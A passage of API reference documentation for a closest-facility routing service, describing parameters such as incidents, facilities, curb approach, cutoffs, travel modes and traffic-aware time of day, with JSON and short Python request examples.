Values: see list Syntax barriers Specify one or more points that act as temporary restrictions or represent additional time or distance that may be required to travel on the underlying streets. Syntax polylineBarriers Specify one or more lines that prohibit travel anywhere the lines intersect the streets. Syntax polygonBarriers Specify polygons that either completely restrict travel or proportionately scale the time or distance required to travel on the streets intersected by the polygons. Syntax returnDirections Specify whether the service should generate driving directions for each route. Values: true| false (default) directionsLanguage Specify the language that should be used when generating driving directions. Applies only when the returnDirections parameter is set to true. Values: en (default) Values: see list directionsOutputType Define the content and verbosity of the driving directions. Applies only when the returnDirections parameter is set to true. Values: esriDOTStandard (default) Values: see list directionsStyleName Specify the name of the formatting style for the directions. Applies only when the returnDirections parameter is set to true. Values: NA Desktop (default) Values: see list directionsLengthUnits Specify the units for displaying travel distance in the driving directions. Applies only when the returnDirections parameter is set to true. Values: esriNAUMiles (default) Values: see list directionsTimeAttributeName Specify the time-based impedance attribute to display the duration of a maneuver Values: TravelTime (default) Values: see list outputLines Specify the type of route features that are output by the service. Values: esriNAOutputLineTrueShape (default) Values: see list returnFacilities Specify if facilities will be returned by the service. Values: true| false (default) returnIncidents Specify if incidents will be returned by the service Values: true| false (default) returnBarriers Specify whether barriers will be returned by the service. Values: true| false (default) returnPolylineBarriers Specify whether polyline barriers will be returned by the service. Values: true| false (default) returnPolygonBarriers Specify whether polygon barriers will be returned by the service. Values: true| false (default) ignoreInvalidLocations Specify whether invalid input locations should be ignored when finding the best solution. Values: true (default)| false outSR Specify the spatial reference of the geometries. outputGeometryPrecision Specify by how much you want to simplify the route geometry. Value: 10 (default) outputGeometryPrecisionUnits Specify the units for the value specified for the outputGeometryPrecision parameter. Values: esriMeters (default) Values: see list overrides Specify additional settings that can influence the behavior of the solver. Syntax Required parameters incidents Use this parameter to specify one or more locations from which the service searches for the nearby locations. These locations are referred to as incidents. Caution: The service imposes a limit of 100 points that can be passed as incidents. If the value is exceeded, the response returns an error message. You can use a simple comma- and semicolon-based syntax if you need to specify only incident point geometries in the default spatial reference WGS84 such as the longitude and latitude values. 
Simple syntax for incidents

incidents=x1,y1; x2, y2; ...; xn, yn

Example using simple syntax

incidents=-117.1957,34.0564; -117.184,34.0546

You can specify incident geometries as well as attributes using a more comprehensive JSON structure that represents a set of features. The JSON structure can include the following properties:

• url: Specify a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set. This property is optional. However, either the features or the url property must be specified.
• features: Specify an array of features. This property is optional. However, either the features or the url property must be specified. Each feature in the features array represents an incident and contains the following properties:
• geometry: Specifies the incident geometry as a point containing x and y properties along with a spatialReference property. The spatialReference property is not required if the coordinate values are in the default spatial reference WGS84. If the coordinate values are in a different spatial reference, you need to specify the well-known ID (WKID) for the spatial reference. You can find the WKID for your spatial reference depending on whether the coordinates are represented in a geographic coordinate system or a projected coordinate system.
• attributes: Specify each attribute as a key-value pair where the key is the name of a given field, and the value is the attribute value for the corresponding field.

Attributes for incidents

When specifying the incidents using the JSON structure, you can specify additional properties for incidents, such as their names, using attributes. The incidents parameter can be specified with the following attributes:

• Name: The name of the incident. This name is used when generating driving directions. It is common to pass the actual name or street address for the incident as a value for the Name attribute. If a value is not specified, an autogenerated name such as Location 1 or Location 2 is used for each incident.

• CurbApproach: Specifies the direction a vehicle may arrive at and depart from the incident. One of the integers listed in the Coded value column in the following table must be specified as a value of this attribute. The values in the Setting column are the descriptive names for CurbApproach attribute values that you might have come across when using ArcGIS Network Analyst extension software.

Setting | Coded value | Description

Either side of vehicle | 0 | The vehicle can approach and depart the incident in either direction, so a U-turn is allowed at the incident. This setting can be chosen if it is possible and desirable for your vehicle to turn around at the incident. This decision may depend on the width of the road and the amount of traffic or whether the incident has a parking lot where vehicles can pull in and turn around.
[Figure: All arrival and departure combinations are allowed with the Either side of vehicle curb approach.]

Right side of vehicle | 1 | When the vehicle approaches and departs the incident, the incident must be on the right side of the vehicle. A U-turn is prohibited. This is typically used for vehicles like busses that must arrive with the bus stop on the right-hand side.
[Figure: The allowed arrival and departure combination for the Right side of vehicle curb approach.]

Left side of vehicle | 2 | When the vehicle approaches and departs the incident, the incident must be on the left side of the vehicle. A U-turn is prohibited. This is typically used for vehicles like busses that must arrive with the bus stop on the left-hand side.
[Figure: The allowed arrival and departure combination for the Left side of vehicle curb approach.]

No U-Turn | 3 | When the vehicle approaches the incident, the incident can be on either side of the vehicle; however, when it departs, the vehicle must continue in the same direction it arrived in. A U-turn is prohibited.
[Figure: The allowed arrival and departure combinations for the No U-Turn curb approach.]

The CurbApproach property was designed to work with both kinds of national driving standards: right-hand traffic (United States) and left-hand traffic (United Kingdom). First, consider an incident on the left side of a vehicle. It is always on the left side regardless of whether the vehicle travels on the left or right half of the road. What may change with national driving standards is your decision to approach from the right or left side. For example, if you want to arrive at an incident and not have a lane of traffic between the vehicle and the incident, you would choose Right side of vehicle in the United States but Left side of vehicle in the United Kingdom.
[Figure: With right-hand traffic, the curb approach that leaves the vehicle closest to the incident is Right side of vehicle.]
[Figure: With left-hand traffic, the curb approach that leaves the vehicle closest to the incident is Left side of vehicle.]

• Attr_TravelTime: Specifies the amount of time for cars, in minutes, that will be added to the total travel time of the route between the incident and the closest facility. The attribute value can be used to model the time spent at the incident. For example, if you are finding the three closest fire stations from a fire incident, the attribute can store the amount of time spent at the fire incident. This could be the time it takes for firefighters to hook up their equipment and begin fighting the fire. The value for this attribute is included in the total travel time for the route and is also displayed in driving directions as service time. A zero or null value indicates that the incident requires no service time. The default value is 0.

• Attr_TruckTravelTime: Specifies the amount of time for trucks, in minutes, that will be added to the total travel time of the route between the incident and the closest facility. The attribute value can be used to model the time spent at the incident. The value for this attribute is included in the total travel time for the route and is also displayed in driving directions as service time. A zero or null value indicates that the incident requires no service time. The default value is 0.

• Attr_WalkTime: Specifies the amount of time for pedestrians, in minutes, that will be added to the total travel time of the route between the incident and the closest facility. The attribute value can be used to model the time spent at the incident. The value for this attribute is included in the total travel time for the route and is also displayed in walking directions as service time. A zero or null value indicates that the incident requires no service time. The default value is 0.

• Attr_Miles: Specifies the distance in miles that will be added to the total distance of the route between the incident and the closest facility. Generally the locations of the incidents are not exactly on the streets but are set back somewhat from the road.
This attribute value can be used to model the distance between the actual incident location and its location on the street if it is important to include that distance in the total travel distance. The default value is 0.

• Attr_Kilometers: Specifies the distance in kilometers that will be added to the total distance of the route between the incident and the closest facility. Generally the locations of the incidents are not exactly on the streets but are set back somewhat from the road. This attribute value can be used to model the distance between the actual incident location and its location on the street if it is important to include that distance in the total travel distance. The default value is 0.

• Cutoff_TravelTime: Specify the travel time for cars, in minutes, at which to stop searching for facilities for a given incident. Any facility beyond the cutoff value will not be searched. If Cutoff_TravelTime is not set for an incident, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_TravelTime attribute allows the ability to overwrite the defaultCutoff value on a per incident basis. The default value for this attribute is null, which indicates not to use any cutoff.

• Cutoff_TruckTravelTime: Specify the travel time for trucks, in minutes, at which to stop searching for facilities for a given incident. Any facility beyond the cutoff value will not be searched. If Cutoff_TruckTravelTime is not set for an incident, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_TruckTravelTime attribute allows the ability to overwrite the defaultCutoff value on a per incident basis. The default value for this attribute is null, which indicates not to use any cutoff.

• Cutoff_WalkTime: Specify the travel time for pedestrians, in minutes, at which to stop searching for facilities for a given incident. Any facility beyond the cutoff value will not be searched. If Cutoff_WalkTime is not set for an incident, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_WalkTime attribute allows the ability to overwrite the defaultCutoff value on a per incident basis. The default value for this attribute is null, which indicates not to use any cutoff.

• Cutoff_Miles: Specify the travel distance in miles at which to stop searching for facilities for a given incident. Any facility beyond the cutoff value will not be searched. If Cutoff_Miles is not set for an incident, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_Miles attribute allows the ability to overwrite the defaultCutoff value on a per incident basis. The default value for this attribute is null, which indicates not to use any cutoff.

• Cutoff_Kilometers: Specify the travel distance in kilometers at which to stop searching for facilities for a given incident. Any facility beyond the cutoff value will not be searched.
The value for the TargetFacilityCount attribute allows the ability to overwrite the defaultTargetFacilityCount value on a per incident basis. The default value for this attribute is null which causes the service to use the value set for the defaultTargetFacilityCount parameter. If the TargetFacilityCount attribute is set to a value other than null, the defaultTargetFacilityCount value is overwritten. • Bearing: Specifies the direction the vehicle or person is moving in. Bearing is measured clockwise from true north and must be in degrees. Typically, values are between 0 and 360; however, negative values are interpreted by subtracting them from 360 degrees. • BearingTol: Short for bearing tolerance, this field specifies the maximum acceptable difference between the heading of a vehicle and a tangent line from the point on a street where Network Analyst attempts to locate the vehicle. The bearing tolerance is used to determine whether the direction in which a vehicle is moving generally aligns with the underlying road. If they align within the given tolerance, the vehicle is located on that edge; if not, the next nearest eligible edge is evaluated. Syntax for specifying incidents using JSON structure for features { "features": [ { "geometry": { "x": <x>, "y": <y>, "spatialReference": { "wkid": <wkid>, "latestWkid": <wkid>, } }, "attributes": { "<field1>": <value11>, "<field2>": <value12> } }, { "geometry": { "x": <x>, "y": <y>, "spatialReference": { "wkid": <wkid>, "latestWkid": <wkid>, } }, "attributes": { "<field1>": <value21>, "<field2>": <value22> } } ], } Example 1: Specifying incident geometries and attributes using JSON structure The example also shows how to specify the Name attribute for each incident and specify a service time for each incident using the Attr_TraveTime attribute. The geometries for incidents are in the default spatial reference, WGS84, and hence the spatialReference property is not required within the geometry property. { "features": [ { "geometry": { "x": -122.4079, "y": 37.78356 }, "attributes": { "Name": "Fire Incident 1", "Attr_TravelTime": 4 } }, { "geometry": { "x": -122.404, "y": 37.782 }, "attributes": { "Name": "Crime Incident 45", "Attr_TravelTime": 5 } } ] } Example 2: Specifying incident geometries in Web Mercator spatial reference using JSON structure. The example also shows how to specify the Name attribute for each incident and specify the distance in miles between the actual incident location and its location on the street using the Attr_Miles attribute. The incident geometries are in the Web Mercator spatial reference and not in the default WGS84 spatial reference. Hence the spatialReference property is required within the geometry property. { "features": [ { "geometry": { "x": -13635398.9398, "y": 4544699.034400001, "spatialReference": { "wkid": 102100 } }, "attributes": { "Name": "123 Main St", "Attr_Miles": 0.29 } }, { "geometry": { "x": -13632733.3441, "y": 4547651.028300002, "spatialReference": { "wkid": 102100 } }, "attributes": { "Name": "845 Mulberry St", "Attr_Miles" : 0.31 } } ] } Syntax for specifying incidents using URL returning a JSON response { "url": "<url>" } Example 3: Specifying incidents using URL. The URL makes a query for a few features from a map service. A URL querying features from a feature service can also be specified. 
{ "url": "http://sampleserver3.arcgisonline.com/ArcGIS/rest/services/Network/USA/MapServer/1/query?where=1%3D1&outFields=Name,RouteName&f=json" } facilities Use this parameter to specify one or more locations that are searched for when finding the closest location. These locations are referred to as facilities. Caution: The service imposes a limit of 100 points that can be passed as facilities. If the value is exceeded, the response returns an error message. You can use a simple comma- and semicolon-based syntax if you need to specify only facility point geometries in the default spatial reference WGS84 such as the longitude and latitude values. Simple syntax for facilities facilities=x1,y1; x2, y2; ...; xn, yn Example using simple syntax facilities=-117.1957,34.0564; -117.184,34.0546 You can specify facility geometries as well as attributes using a more comprehensive JSON structure that represents a set of features. The JSON structure can include the following properties: • url: Specify a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set. This property is optional. However either features or url property must be specified. • features: Specify an array of features. This property is optional. However, either the features or the url property must be specified. Each feature in the features array represents an facility and contains the following properties: • geometry: Specifies the facility geometry as a point containing x and y properties along with a spatialReference property. The spatialReference property is not required if the coordinate values are in the default spatial reference WGS84. If the coordinate values are in a different spatial reference, you need to specify the well-known ID (WKID) for the spatial reference. You can find the WKID for your spatial reference depending on whether the coordinates are represented in a geographic coordinate system or a projected coordinate system. • attributes: Specify each attribute as a key-value pair where the key is the name of a given field, and the value is the attribute value for the corresponding field. Attributes for facilities When specifying the stops using JSON structure, you can specify additional properties for facilities such as their names using attributes. The facilities parameter can be specified with the following attributes: • Name: The name of the facility. This name is used when generating driving directions. It is common to pass the actual name or street address for the facility as a value for Name attribute. If a value is not specified, an autogenerated name such as Location 1 or Location 2 is used for each facility. • CurbApproach: Specifies the direction a vehicle may arrive at and depart from the facility. One of the integers listed in Coded value column in the following table must be specified as a value of this attribute. The values in the Setting column are the descriptive names for CurbApproach attribute values that you might have come across when using ArcGIS Network Analyst extension software. SettingCoded valueDescription Either side of vehicle 0 The vehicle can approach and depart the facility in either direction, so a U-turn is allowed at the facility. This setting can be chosen if it is possible and desirable for your vehicle to turn around at the facility. This decision may depend on the width of the road and the amount of traffic or whether the facility has a parking lot where vehicles can pull in and turn around. 
Either side of vehicle All arrival and departure combinations are allowed with the Either side of vehicle curb approach. Right side of vehicle 1 When the vehicle approaches and departs the facility, the facility must be on the right side of the vehicle. A U-turn is prohibited. This is typically used for vehicles like busses that must arrive with the bus stop on the right hand side. Right side of vehicle The allowed arrival and departure combination for the Right side of vehicle curb approach. Left side of vehicle 2 When the vehicle approaches and departs the facility, the facility must be on the left side of the vehicle. A U-turn is prohibited. This is typically used for vehicles like busses that must arrive with the bus stop on the left hand side. Left side of vehicle The allowed arrival and departure combination for the Left side of vehicle curb approach. No U-Turn 3 When the vehicle approaches the facility, the facility can be on either side of the vehicle; however, when it departs, the vehicle must continue in the same direction it arrived in. A U-turn is prohibited. No U-turns The allowed arrival and departure combinations for the No U-Turn curb approach. The CurbApproach property was designed to work with both kinds of national driving standards: right-hand traffic (United States) and left-hand traffic (United Kingdom). First, consider a facility on the left side of a vehicle. It is always on the left side regardless of whether the vehicle travels on the left or right half of the road. What may change with national driving standards is your decision to approach from the right or left side. For example, if you want to arrive at a facility and not have a lane of traffic between the vehicle and the facility, you would choose Right side of vehicle in the United States but Left side of vehicle in the United Kingdom. Right side of vehicle with right-hand traffic. With right-hand traffic, the curb approach that leaves the vehicle closest to the facility is Right side of vehicle. Left side of vehicle with left-hand traffic With left-hand traffic, the curb approach that leaves the vehicle closest to the facility is Left side of vehicle. • Attr_TravelTime: Specifies the amount of time for cars, in minutes, that will be added to the total travel time of the route between the incident and the closest facility. The attribute value can be used to specify the turnout time for the facility. For example, when finding the three closest fire stations from a fire incident, this attribute can be used to store the time it takes a crew to don the appropriate protective equipment and exit the fire station. The value for this attribute is included in the total travel time for the route and is also displayed in driving directions as service time. A zero or null value indicates that the facility requires no service time. The default value is 0. • Attr_TruckTravelTime: Specifies the amount of time for trucks, in minutes, that will be added to the total travel time of the route between the incident and the closest facility. The value for this attribute is included in the total travel time for the route and is also displayed in driving directions as service time. A zero or null value indicates that the facility requires no service time. The default value is 0. • Attr_WalkTime: Specifies the amount of time for pedestrians, in minutes, that will be added to the total travel time of the route between the incident and the closest facility. 
The value for this attribute is included in the total travel time for the route and is also displayed in walking directions as service time. A zero or null value indicates that the facility requires no service time. The default value is 0.

• Attr_Miles: Specifies the distance in miles that will be added to the total distance of the route between the incident and the closest facility. Generally the locations of the facilities are not exactly on the streets but are set back somewhat from the road. This attribute value can be used to model the distance between the actual facility location and its location on the street if it is important to include that distance in the total travel distance. The default value is 0.

• Attr_Kilometers: Specifies the distance in kilometers that will be added to the total distance of the route between the incident and the closest facility. Generally the locations of the facilities are not exactly on the streets but are set back somewhat from the road. This attribute value can be used to model the distance between the actual facility location and its location on the street if it is important to include that distance in the total travel distance. The default value is 0.

• Cutoff_TravelTime: Specify the travel time for cars, in minutes, at which to stop searching for facilities for a given incident. Any facility beyond the cutoff value will not be searched. If Cutoff_TravelTime is not set for a facility, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_TravelTime attribute allows the ability to overwrite the defaultCutoff value on a per facility basis. The default value for this attribute is null, which indicates not to use any cutoff.

• Cutoff_TruckTravelTime: Specify the travel time for trucks, in minutes, at which to stop searching for facilities for a given incident. Any facility beyond the cutoff value will not be searched. If Cutoff_TruckTravelTime is not set for a facility, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_TruckTravelTime attribute allows the ability to overwrite the defaultCutoff value on a per facility basis. The default value for this attribute is null, which indicates not to use any cutoff.

• Cutoff_WalkTime: Specify the travel time for pedestrians, in minutes, at which to stop searching for facilities for a given incident. Any facility beyond the cutoff value will not be searched. If Cutoff_WalkTime is not set for a facility, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_WalkTime attribute allows the ability to overwrite the defaultCutoff value on a per facility basis. The default value for this attribute is null, which indicates not to use any cutoff.

• Cutoff_Miles: Specify the travel distance in miles at which to stop searching for facilities for a given incident. Any facility beyond the cutoff value will not be searched. If Cutoff_Miles is not set for a facility, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_Miles attribute allows the ability to overwrite the defaultCutoff value on a per facility basis. The default value for this attribute is null, which indicates not to use any cutoff.

• Cutoff_Kilometers: Specify the travel distance in kilometers at which to stop searching for facilities for a given incident. Any facility beyond the cutoff value will not be searched.
Syntax for specifying facilities using a JSON structure for features:

{
  "features": [
    {
      "geometry": {
        "x": <x>,
        "y": <y>,
        "spatialReference": {"wkid": <wkid>, "latestWkid": <wkid>}
      },
      "attributes": {"<field1>": <value11>, "<field2>": <value12>}
    },
    {
      "geometry": {
        "x": <x>,
        "y": <y>,
        "spatialReference": {"wkid": <wkid>, "latestWkid": <wkid>}
      },
      "attributes": {"<field1>": <value21>, "<field2>": <value22>}
    }
  ]
}

Example 1: Specifying facility geometries and attributes using a JSON structure. The example also shows how to specify the Name attribute for each facility and a service time for each facility using the Attr_TravelTime attribute. The geometries for facilities are in the default spatial reference, WGS84, and hence the spatialReference property is not required within the geometry property.

{
  "features": [
    {
      "geometry": {"x": -122.4079, "y": 37.78356},
      "attributes": {"Name": "Fire Station 34", "Attr_TravelTime": 4}
    },
    {
      "geometry": {"x": -122.404, "y": 37.782},
      "attributes": {"Name": "Fire Station 29", "Attr_TravelTime": 5}
    }
  ]
}

Example 2: Specifying facility geometries in the Web Mercator spatial reference using a JSON structure. The example also shows how to specify the Name attribute for each facility and the distance in miles between the actual facility location and its location on the street using the Attr_Miles attribute. The facility geometries are in the Web Mercator spatial reference and not in the default WGS84 spatial reference. Hence, the spatialReference property is required within the geometry property.

{
  "features": [
    {
      "geometry": {"x": -13635398.9398, "y": 4544699.034400001, "spatialReference": {"wkid": 102100}},
      "attributes": {"Name": "Store 45", "Attr_Miles": 0.29}
    },
    {
      "geometry": {"x": -13632733.3441, "y": 4547651.028300002, "spatialReference": {"wkid": 102100}},
      "attributes": {"Name": "Store 67", "Attr_Miles": 0.31}
    }
  ]
}

Syntax for specifying facilities using a URL returning a JSON response:

{ "url": "<url>" }

Example 3: Specifying facilities using a URL. The URL makes a query for a few features from a map service. A URL querying features from a feature service can also be specified.

{ "url": "http://sampleserver3.arcgisonline.com/ArcGIS/rest/services/Network/USA/MapServer/1/query?where=1%3D1&outFields=Name,RouteName&f=json" }
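For context, the facilities parameter is sent as form data in an HTTP request to the solve endpoint. The following is a minimal sketch in Python using the requests library; the service URL is a placeholder, the token is assumed to be obtained as described under the token parameter, and the incident location is a made-up sample:

import json
import requests

# Placeholder endpoint; substitute the actual closest facility service URL
# for your organization.
SERVICE_URL = "https://<server>/arcgis/rest/services/ClosestFacility/solveClosestFacility"

facilities = {"features": [
    {"geometry": {"x": -122.4079, "y": 37.78356},
     "attributes": {"Name": "Fire Station 34", "Attr_TravelTime": 4}},
]}
incidents = {"features": [
    {"geometry": {"x": -122.401, "y": 37.780},
     "attributes": {"Name": "Incident 1"}},
]}

params = {
    "facilities": json.dumps(facilities),  # JSON structures travel as strings
    "incidents": json.dumps(incidents),
    "returnCFRoutes": "true",              # see the returnCFRoutes parameter below
    "token": "<your-token>",
    "f": "json",
}
response = requests.post(SERVICE_URL, data=params)
print(response.json())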
returnCFRoutes
Use this parameter to specify whether the service should return routes.

• true—Routes are generated. The routes are available in the routes property of the JSON response. The shape of the routes depends on the value for the outputLines parameter.
• false—Routes are not generated.

Caution: The default value for the returnCFRoutes parameter is false. In order to get the best routes between the incident and the closest facilities, this parameter should be specified as true. If you also want the service to return the point features representing the closest facilities from the incidents, you should specify the returnFacilities parameter as true.

Tip: You may not want to return routes if your application has to display only the driving directions between the stops. In that case it is sufficient to set the returnDirections parameter to true; returning routes will not provide any additional information and will increase the overall response size.

token
Use this parameter to specify a token that provides the identity of a user that has the permissions to access the service. Accessing services provided by Esri provides more information on how such an access token can be obtained.

f
Use this parameter to specify the response format. Choose either json or pjson, for example, f=json. The pjson value is used for printing the JSON response in a pretty format.

Optional parameters

travelMode
Choose the mode of transportation for the analysis. Travel modes are managed in ArcGIS Online and can be configured by the administrator of your organization to better reflect your organization's workflows. You need to specify the JSON object containing the settings for a travel mode supported by your organization. To get a list of supported travel modes, execute the GetTravelModes tool from the Utilities service.

The value for the travelMode parameter should be a JSON object representing travel mode settings. When you use the GetTravelModes tool from the Utilities service, you get a string representing the travel mode JSON. You need to convert this string to a valid JSON object using your API and then pass the JSON object as the value for the travelMode parameter. For example, below is a string representing the Walking Time travel mode as returned by the GetTravelModes tool.
"{\"attributeParameterValues\": [{\"parameterName\": \"Restriction Usage\", \"attributeName\": \"Walking\", \"value\": \"PROHIBITED\"}, {\"parameterName\": \"Restriction Usage\", \"attributeName\": \"Preferred for Pedestrians\", \"value\": \"PREFER_LOW\"}, {\"parameterName\": \"Walking Speed (km/h)\", \"attributeName\": \"WalkTime\", \"value\": 5}], \"description\": \"Follows paths and roads that allow pedestrian traffic and finds solutions that optimize travel time. The walking speed is set to 5 kilometers per hour.\", \"impedanceAttributeName\": \"WalkTime\", \"simplificationToleranceUnits\": \"esriMeters\", \"uturnAtJunctions\": \"esriNFSBAllowBacktrack\", \"restrictionAttributeNames\": [\"Preferred for Pedestrians\", \"Walking\"], \"useHierarchy\": false, \"simplificationTolerance\": 2, \"timeAttributeName\": \"WalkTime\", \"distanceAttributeName\": \"Miles\", \"type\": \"WALK\", \"id\": \"caFAgoThrvUpkFBW\", \"name\": \"Walking Time\"}"

The above value should be converted to a valid JSON object and passed as the value for the travelMode parameter:

travelMode={"attributeParameterValues":[{"parameterName":"Restriction Usage","attributeName":"Walking","value":"PROHIBITED"},{"parameterName":"Restriction Usage","attributeName":"Preferred for Pedestrians","value":"PREFER_LOW"},{"parameterName":"Walking Speed (km/h)","attributeName":"WalkTime","value":5}],"description":"Follows paths and roads that allow pedestrian traffic and finds solutions that optimize travel time. The walking speed is set to 5 kilometers per hour.","impedanceAttributeName":"WalkTime","simplificationToleranceUnits":"esriMeters","uturnAtJunctions":"esriNFSBAllowBacktrack","restrictionAttributeNames":["Preferred for Pedestrians","Walking"],"useHierarchy":false,"simplificationTolerance":2,"timeAttributeName":"WalkTime","distanceAttributeName":"Miles","type":"WALK","id":"caFAgoThrvUpkFBW","name":"Walking Time"}

Caution: When the travelMode parameter is set, you are choosing a travel mode configured in your organization, and the service automatically overrides the values of other parameters with values that model the chosen travel mode. The following parameters are overridden: impedanceAttributeName, attributeParameterValues, restrictUturns, useHierarchy, restrictionAttributeNames, outputGeometryPrecision, outputGeometryPrecisionUnits, and directionsTimeAttributeName. If you don't set travelMode, the service honors the default or user-defined values for the parameters that would otherwise be overridden, so you can create your own travel mode.
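Because GetTravelModes returns the travel mode as an escaped string, the usual pattern is to parse it and re-serialize it into the request. A short sketch in Python, where walking_time_str stands for the full string shown above (truncated here for brevity):

import json

# Escaped string as returned by the GetTravelModes tool (truncated).
walking_time_str = '{"impedanceAttributeName": "WalkTime", "name": "Walking Time"}'

travel_mode = json.loads(walking_time_str)        # now a real JSON object (dict)
params = {"travelMode": json.dumps(travel_mode)}  # serialized into the request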
defaultTargetFacilityCount
The service can be used to find multiple closest facilities from an incident. Use this parameter to specify the number of closest facilities to find per incident. This is useful in situations, such as a fire, where multiple fire engines may be required from different fire stations. The service can find, for example, the three nearest fire stations to a fire.

Caution: The service imposes a maximum limit of 10 facilities to find from each incident.

The value for the defaultTargetFacilityCount parameter can be overwritten on a per-incident basis by specifying a value for the TargetFacilityCount attribute when specifying the incidents parameter.

travelDirection
Use this parameter to specify whether you want to search for the closest facility as measured from the incident to the facility or from the facility to the incident. The parameter can be specified using the following values:

• esriNATravelDirectionFromFacility: Direction of travel is from facilities to incidents.
• esriNATravelDirectionToFacility: Direction of travel is from incidents to facilities.

The two values can find different facilities, as the travel time along some streets may vary based on the travel direction and one-way restrictions. For instance, a facility may be a 10-minute drive from the incident while traveling from the incident to the facility, but a 15-minute journey while traveling from the facility to the incident because of different travel times in that direction. Fire departments commonly use the esriNATravelDirectionFromFacility value for the parameter, since they are concerned with the time it takes to travel from the fire station (facility) to the location of the emergency (incident). A retail store (facility) is more concerned with the time it takes the shoppers (incidents) to reach the store; therefore, stores commonly use the esriNATravelDirectionToFacility parameter value. The default value for this parameter is esriNATravelDirectionToFacility.

defaultCutoff
Use this parameter to specify the travel time or travel distance value at which to stop searching for facilities for a given incident. For instance, while finding the closest hospitals from the site of an accident, a cutoff value of 15 minutes means that the service searches for the closest hospital within 15 minutes of the incident. If the closest hospital is 17 minutes away, no routes are returned in the output routes. A cutoff value is especially useful when searching for multiple facilities.

The units for this parameter are based on the value of the impedanceAttributeName parameter. If the impedanceAttributeName parameter is TravelTime, the defaultCutoff is specified in minutes. Otherwise, the value is specified in miles or kilometers based on whether the impedanceAttributeName is set to Miles or Kilometers, respectively. The default value for this parameter is null, which indicates not to use any cutoff.

The value for the defaultCutoff parameter can be overwritten on a per-incident or per-facility basis by specifying a value for the Cutoff_TravelTime, Cutoff_Miles, or Cutoff_Kilometers attributes when specifying the incidents or the facilities parameter.
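To make the interplay of these parameters concrete, here is a hypothetical sketch in Python combining them; Station B's Cutoff_TravelTime overrides the 15-minute default for that facility only, and the names and coordinates are sample values:

import json

params = {
    "defaultTargetFacilityCount": 3,   # up to three facilities per incident
    "defaultCutoff": 15,               # minutes, when impedance is TravelTime
    "facilities": json.dumps({"features": [
        {"geometry": {"x": -122.4079, "y": 37.78356},
         "attributes": {"Name": "Station A"}},
        {"geometry": {"x": -122.404, "y": 37.782},
         "attributes": {"Name": "Station B", "Cutoff_TravelTime": 20}},
    ]}),
}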
timeOfDay
Specify whether travel times should consider traffic conditions. To use traffic in the analysis, set impedanceAttributeName to TravelTime, and assign a value to timeOfDay. The timeOfDay value indicates the target start time of the routes in the analysis. If timeOfDayUsage is set to esriNATimeOfDayUseAsEndTime, the value represents when the routes should arrive at their nearby locations. The time is specified as Unix time (milliseconds since midnight, January 1, 1970). If a time of day is not passed in, the service uses static road speeds based on average historical speeds or posted speed limits. It uses posted speeds in areas where historical traffic information isn't available.

Note: Traffic is supported only with the driving time impedance or travel mode. It's not supported with trucking.

The service supports two kinds of traffic: typical and live. Typical traffic references travel speeds that are made up of historical averages for each five-minute interval spanning a week. Live traffic retrieves speeds from a traffic feed that processes phone probe records, sensors, and other data sources to record actual travel speeds and predict speeds for the near future. The Data Coverage page shows the countries Esri currently provides traffic data for.

Typical traffic: To ensure the task uses typical traffic in locations where it is available, choose a time and day of the week, and then convert the day of the week to one of the following dates from 1990:

• Monday—1/1/1990
• Tuesday—1/2/1990
• Wednesday—1/3/1990
• Thursday—1/4/1990
• Friday—1/5/1990
• Saturday—1/6/1990
• Sunday—1/7/1990

Set the time and date as Unix time in milliseconds. For example, to solve for 1:03 p.m. on Thursdays, set the time and date to 1:03 p.m., 4 January 1990, and convert to milliseconds (631458180000).

Note:
• The default value is null, which means the effect of changing traffic isn't included in the analysis.
• Although the dates representing days of the week are from 1990, typical traffic is calculated from recent traffic trends—usually over the last several months.
• This parameter is ignored when impedanceAttributeName is set to distance units.
• The time zone for timeOfDay can be UTC or the time zone or zones in which the points in facilities or incidents are located. Specify time zones with the timeOfDayIsUTC parameter.
• All incidents must be in the same time zone when specifying a start time and traveling from incident to facility, or when specifying an end time and traveling from facility to incident.
• All facilities must be in the same time zone when specifying a start time and traveling from facility to incident, or when specifying an end time and traveling from incident to facility.

Examples:
• "timeOfDay": 631458180000 // 13:03, 4 January 1990. Typical traffic on Thursdays at 1:03 p.m.
• "timeOfDay": 631731600000 // 17:00, 7 January 1990. Typical traffic on Sundays at 5:00 p.m.
• "timeOfDay": 1413964800000 // 8:00, 22 October 2014. If the current time is between 8:00 p.m., 21 Oct. 2014 and 8:00 p.m., 22 Oct. 2014, live traffic speeds are referenced in the analysis; otherwise, typical traffic speeds are referenced.
• "timeOfDay": 1426674000000 // 10:20, 18 March 2015. If the current time is between 10:20 p.m., 17 Mar. 2015 and 10:20 p.m., 18 Mar. 2015, live traffic speeds are referenced in the analysis; otherwise, typical traffic speeds are referenced.
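The millisecond values above are straightforward to compute. A small sketch in Python reproducing the 1:03 p.m. Thursday example; note that whether the service interprets the value as UTC or local time depends on the timeOfDayIsUTC parameter described next:

from datetime import datetime, timezone

# 1:03 p.m. on the Thursday sentinel date (4 January 1990), expressed as
# Unix time in milliseconds; matches the 631458180000 example above.
dt = datetime(1990, 1, 4, 13, 3, tzinfo=timezone.utc)
time_of_day = int(dt.timestamp() * 1000)
print(time_of_day)  # 631458180000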
timeOfDayIsUTC
Specify the time zone or zones of the timeOfDay parameter. There are two options: false (default) and true.

false (use geographically local time zones): The timeOfDay value refers to the time zone in which the input facilities or incidents are located. If the travelDirection and timeOfDayUsage parameters indicate a departure or arrival time at the facilities, timeOfDay refers to the time zone of the facilities. Likewise, if the two parameters indicate a departure or arrival time at the incidents, timeOfDay refers to the time zone of the incidents. Illustration: setting timeOfDay to 9:00 a.m., 4 January 1990 (631443600000 milliseconds), setting timeOfDayIsUTC to false, and submitting a valid request causes the drive times for points in the Eastern Time Zone to start at 9:00 a.m. Eastern Time (2:00 p.m. UTC).

